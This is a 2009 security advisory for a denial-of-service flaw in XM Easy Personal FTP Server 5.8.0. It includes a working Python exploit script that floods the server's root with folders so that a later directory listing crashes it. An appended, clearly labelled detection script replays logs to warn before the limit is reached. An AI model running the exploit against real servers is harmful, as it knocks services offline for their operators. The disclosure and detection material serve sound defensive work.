
XM Easy Personal FTP Server Remote DoS Vulnerability






Date of Discovery: 24-Nov-2009

Credits: leinakesi[at]gmail.com

Vendor: Dxmsoft
*******************************************************************************
Affected:

	XM Easy Personal FTP Server 5.8.0
	Earlier versions may also be affected
*******************************************************************************
Overview:

	XM Easy Personal FTP Server fails to handle more than 2000 files or folders in the root directory.
*******************************************************************************
Details:

	If you can log on to the server, the following steps crash the server, which leads to DoS.

	1. Upload 2000 files or folders.
	2. Close the current connection.
	3. Use an FTP client to reconnect to the server.
		user ...
		pass ...
		port ...
		list ...
		crash!!!!!!
*******************************************************************************
Exploit example:

1. Upload 2000 folders.
#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py        \n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string='a'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)

    for i in range(1,200):
        sock.send("mkd " + "a" * i +"\r\n")
        print "[-] " + ("mkd " + "a" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
    for i in range(1,200):
        sock.send("mkd " + "b" * i +"\r\n")
        print "[-] " + ("mkd " + "b" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
    for i in range(1,200):
        sock.send("mkd " + "c" * i +"\r\n")
        print "[-] " + ("mkd " + "c" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
    for i in range(1,200):
        sock.send("mkd " + "d" * i +"\r\n")
        print "[-] " + ("mkd " + "d" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
    for i in range(1,200):
        sock.send("mkd " + "e" * i +"\r\n")
        print "[-] " + ("mkd " + "e" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
    for i in range(1,200):
        sock.send("mkd " + "f" * i +"\r\n")
        print "[-] " + ("mkd " + "f" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
    for i in range(1,200):
        sock.send("mkd " + "g" * i +"\r\n")
        print "[-] " + ("mkd " + "g" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
    for i in range(1,200):
        sock.send("mkd " + "h" * i +"\r\n")
        print "[-] " + ("mkd " + "h" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
    for i in range(1,200):
        sock.send("mkd " + "i" * i +"\r\n")
        print "[-] " + ("mkd " + "i" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"
    for i in range(1,200):
        sock.send("mkd " + "j" * i +"\r\n")
        print "[-] " + ("mkd " + "j" * i +"\r\n")
        r=sock.recv(1024)
        print "[+] " + r + "\r\n"

    sock.close()
    sys.exit(0);

2. Use an FTP client to reconnect to the server, for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir

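*******************************************************************************
Detection example (added here, not part of the original advisory or the vendor's code): a log replay that tracks how many entries sit directly in the FTP root and reports which clients are adding them, so an operator is alerted before the 2000-entry condition described above is reached. The log layout, the 1600-entry warning margin and all function names are assumptions made for this example; the sample log is constructed.

```python
import posixpath
import re
from collections import Counter

CRASH_LIMIT = 2000   # root entry count the advisory reports as the crash trigger
WARN_AT = 1600       # assumed alert margin (80% of the limit), chosen for this example

# Assumed log layout, not the product's real format:
#   <time> <session> <client-ip> <COMMAND> <argument>
# The log is assumed to list only commands the server accepted.
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+([A-Za-z]+)\s+(.*)$")
CREATE = {"MKD", "XMKD", "STOR", "STOU"}
REMOVE = {"RMD", "XRMD", "DELE"}


def audit(lines, existing_entries=0):
    """Replay FTP commands and track how many entries sit directly in the root."""
    cwd = {}              # session id -> current directory
    created = Counter()   # client ip -> entries it added to the root
    total = existing_entries
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue      # skip lines that do not fit the assumed layout
        _, session, ip, cmd, arg = m.groups()
        cmd = cmd.upper()                       # FTP verbs are case-insensitive
        path = posixpath.normpath(posixpath.join(cwd.get(session, "/"), arg))
        if cmd == "CWD":
            cwd[session] = path
        elif path != "/" and posixpath.dirname(path) == "/":
            if cmd in CREATE:
                total += 1
                created[ip] += 1
            elif cmd in REMOVE:
                total = max(0, total - 1)
    status = "at_limit" if total >= CRASH_LIMIT else "warn" if total >= WARN_AT else "ok"
    return {"root_entries": total, "status": status, "top_creators": created.most_common(3)}


def sample_log():
    """Constructed input: one client bulk-creates root folders, another works in /pub."""
    lines = ["t0 s2 192.0.2.9 CWD pub", "t0 s2 192.0.2.9 STOR report.txt"]
    lines += ["t%d s1 192.0.2.5 mkd dir%04d" % (i, i) for i in range(1700)]
    lines.append("t9 s1 192.0.2.5 RMD dir0000")
    return lines


if __name__ == "__main__":
    print(audit(sample_log(), existing_entries=10))
```

Pass the number of entries already present in the root as existing_entries so the running total reflects the directory's real size rather than only what the log window shows.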
